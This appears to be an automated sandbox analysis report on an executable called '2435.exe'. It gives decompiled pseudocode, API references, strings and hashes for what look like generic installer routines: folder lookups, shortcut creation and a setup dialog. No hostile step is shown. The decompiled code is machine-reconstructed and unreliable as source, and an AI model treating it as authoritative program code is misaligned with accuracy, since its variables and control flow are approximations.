Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\2435.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42

GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
SetDlgItemTextA.USER32 ref: 0040462A

Strings

A, xrefs: 0040447D
C:\Users\user\AppData\Local\Temp, xrefs: 004044AA
Call, xrefs: 004044BB, 004044C0, 004044CB

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$Call
API String ID: 2246997448-2175137099
Opcode ID: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
Opcode Fuzzy Hash: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t74 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405B88(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E00405B66(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E00405AC4(_t86,  *0x423ea8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DC8(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423ea4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423ed8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405B88(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}

0x00405b88
0x00405b88
0x00405b88
0x00405b8e
0x00405b93
0x00405ba4
0x00405ba4
0x00405baf
0x00405bb1
0x00405bb6
0x00405bb9
0x00405bba
0x00405bc1
0x00405bc3
0x00405bc9
0x00405bcc
0x00405bcc
0x00405da5
0x00405da5
0x00405da9
0x00000000
0x00000000
0x00405bd9
0x00405bdf
0x00000000
0x00000000
0x00405be5
0x00405be6
0x00405be9
0x00405bec
0x00405d98
0x00405da2
0x00405da4
0x00405da4
0x00405d9a
0x00405d9c
0x00405d9e
0x00405d9f
0x00405d9f
0x00000000
0x00405d98
0x00405bf2
0x00405bf6
0x00405c06
0x00405c0a
0x00405c11
0x00405c14
0x00405c18
0x00405c1e
0x00405c21
0x00405c24
0x00405c27
0x00405d42
0x00405d45
0x00405d75
0x00405d78
0x00405d7d
0x00405d81
0x00405d81
0x00405d86
0x00405d87
0x00405d8c
0x00405d8f
0x00405d91
0x00000000
0x00405d91
0x00405d47
0x00405d4a
0x00405d5f
0x00405d66
0x00405d4c
0x00405d53
0x00405d53
0x00405d6e
0x00405d71
0x00405d3a
0x00405d3b
0x00405d3b
0x00000000
0x00405d71
0x00405c2f
0x00405c30
0x00405c36
0x00405c38
0x00405c52
0x00405c52
0x00405c59
0x00405c59
0x00405c60
0x00405c64
0x00405c64
0x00405c65
0x00405c67
0x00405ca0
0x00405ca3
0x00405cb3
0x00405cb6
0x00405cbe
0x00405cc4
0x00405cc4
0x00405d20
0x00405d20
0x00405d22
0x00000000
0x00000000
0x00405cc8
0x00405ccf
0x00405cd0
0x00405cd2
0x00405cec
0x00405cfa
0x00405d00
0x00405d02
0x00405d1d
0x00405d1d
0x00405d1d
0x00000000
0x00405d1d
0x00405d08
0x00405d13
0x00405d19
0x00405d1b
0x00000000
0x00000000
0x00000000
0x00405d1b
0x00405cd4
0x00405cd7
0x00000000
0x00000000
0x00405ce6
0x00405ce8
0x00405cea
0x00000000
0x00000000
0x00000000
0x00405cea
0x00000000
0x00405d20
0x00405cab
0x00000000
0x00405c69
0x00405c6e
0x00405c84
0x00405c89
0x00405c8c
0x00405d29
0x00405d29
0x00405d2d
0x00405d35
0x00405d35
0x00000000
0x00405d2d
0x00405c96
0x00405d24
0x00405d24
0x00405d27
0x00000000
0x00000000
0x00000000
0x00405d27
0x00405c67
0x00405c3a
0x00405c3e
0x00000000
0x00000000
0x00405c40
0x00405c44
0x00000000
0x00000000
0x00405c46
0x00405c4a
0x00000000
0x00405c4c
0x00405c4c
0x00000000
0x00405c4c
0x00405c4a
0x00405daf
0x00405db9
0x00405dc5
0x00405dc5
0x00000000

APIs

GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
GetSystemDirectoryA.KERNEL32 ref: 00405CAB
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CBE
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405D08
CoTaskMemFree.OLE32(00000000), ref: 00405D13
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
lstrlenA.KERNEL32(Call,?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D2F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405C7A
Call, xrefs: 00405BB1, 00405C78, 00405C95, 00405CAA, 00405CBD, 00405CD9, 00405D04, 00405D34, 00405D3A, 00405D52, 00405D65, 00405D80, 00405D86, 00405D91, 00405DBB

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1230650788
Opcode ID: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
Opcode Fuzzy Hash: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E

Uniqueness

Uniqueness Score: -1.00%

Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409368, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x00402029
0x00402033
0x0040203c
0x00402046
0x0040204f
0x00402059
0x0040205d
0x0040205d
0x00402062
0x00402073
0x0040207b
0x0040215b
0x0040215b
0x00402162
0x00402081
0x00402081
0x00402092
0x00402096
0x0040209c
0x004020a6
0x004020a8
0x004020b3
0x004020b6
0x004020c3
0x004020c5
0x004020c7
0x004020ce
0x004020d1
0x004020d1
0x004020d4
0x004020de
0x004020e6
0x004020eb
0x004020f7
0x004020f7
0x004020fa
0x00402103
0x00402106
0x0040210f
0x00402114
0x00402126
0x00402135
0x00402137
0x00402143
0x00402143
0x00402135
0x00402145
0x0040214b
0x0040214b
0x0040214e
0x00402154
0x00402159
0x0040216e
0x00000000
0x00000000
0x00000000
0x00402159
0x00402164
0x0040288e
0x0040289a

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004020AB

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-1943935188
Opcode ID: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
Opcode Fuzzy Hash: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402656
0x0040266a
0x00402675
0x00402676
0x004027b1
0x00402658
0x00402658
0x0040265a
0x0040265c
0x0040265c
0x0040288e
0x0040289a

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
Opcode Fuzzy Hash: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403A45(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420484 = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420498 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t91;
						E00403F18(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t122 =  *0x4091c4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405B88(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F3A(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f460, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420498);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f460);
							}
							E00403F4D();
							E00405B66(0x4204a0, 0x4236a0);
							E00405B88(0x4204a0, _t125, _t130,  &(0x4204a0[lstrlenA(0x4204a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x4204a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc70 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F18(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420478, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f868 = _t127;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x4214a0 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403a4e
0x00403a57
0x00403b98
0x00403b9c
0x00403ba0
0x00403ba2
0x00403ba7
0x00403bb2
0x00403bbd
0x00403bc2
0x00403bc4
0x00403bc6
0x00403bc9
0x00403bce
0x00403bdc
0x00403be9
0x00403bf0
0x00403bf0
0x00403bf1
0x00403bf1
0x00403bf6
0x00403bfc
0x00403c03
0x00403c09
0x00403c0b
0x00403c4b
0x00403c50
0x00403c55
0x00403c55
0x00403c5a
0x00403c63
0x00403c65
0x00403c6a
0x00403c70
0x00403c74
0x00403c74
0x00403c79
0x00403c7f
0x00000000
0x00000000
0x00403c8a
0x00403c90
0x00000000
0x00000000
0x00403c99
0x00403ca1
0x00403ca6
0x00403ca9
0x00403caf
0x00403cb4
0x00403cb7
0x00403cbd
0x00403cc2
0x00403cc5
0x00403ccb
0x00403cd3
0x00403cd9
0x00403cdf
0x00403ce3
0x00403cea
0x00403cea
0x00403cea
0x00403cf4
0x00403d06
0x00403d12
0x00403d17
0x00403d21
0x00403d27
0x00403d29
0x00403d2e
0x00403d2b
0x00403d2b
0x00403d2b
0x00403d3e
0x00403d56
0x00403d58
0x00403d5e
0x00403d73
0x00403d60
0x00403d69
0x00403d6b
0x00403d6b
0x00403d79
0x00403d89
0x00403d9a
0x00403da1
0x00403da7
0x00403dab
0x00403db0
0x00403db2
0x00000000
0x00403db8
0x00403db8
0x00403dba
0x00000000
0x00000000
0x00403dc0
0x00403dc4
0x00403de9
0x00403def
0x00403df5
0x00403df7
0x00000000
0x00000000
0x00403e1d
0x00403e23
0x00403e25
0x00403e2a
0x00000000
0x00000000
0x00403e30
0x00403e33
0x00403e36
0x00403e4d
0x00403e59
0x00403e72
0x00403e78
0x00403e7c
0x00403e81
0x00403e87
0x00000000
0x00000000
0x00403e91
0x00403e9c
0x00000000
0x00403e9c
0x00403dc6
0x00403dcc
0x00000000
0x00000000
0x00403dd2
0x00403dd8
0x00000000
0x00000000
0x00000000
0x00403dde
0x00403db2
0x00403ea9
0x00403eb5
0x00403ebc
0x00000000
0x00403c0d
0x00403c0d
0x00403c10
0x00403c43
0x00403c43
0x00403c45
0x00000000
0x00000000
0x00000000
